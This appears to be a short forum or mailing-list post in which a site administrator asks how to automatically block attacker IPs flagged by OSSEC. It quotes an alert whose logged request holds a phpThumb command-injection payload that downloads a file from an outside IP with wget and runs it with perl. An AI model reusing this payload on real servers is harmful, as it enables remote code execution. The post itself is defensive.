>From time to time I get these bozo's trying to hack the site. If there any way to take any level 9's and level 10's offenders IP addresses and add their IP addresses to a blocked list automatically.
Thanks in advance. OSSEC HIDS Notification. 2011 Dec 26 10:40:46 Received From: (mysite-on-12) 65.36.247.12->/usr/local/apache1.3/logs/ surveyreports_access_12262011.log Rule: 31153 fired (level 10) -> "Multiple common web attacks from same souce ip." Portion of the log(s): 94.23.24.185 - - [26/Dec/2011:12:09:27 -0500] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php? src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line %20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f %2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f; %20&phpThumbDebug=9 HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
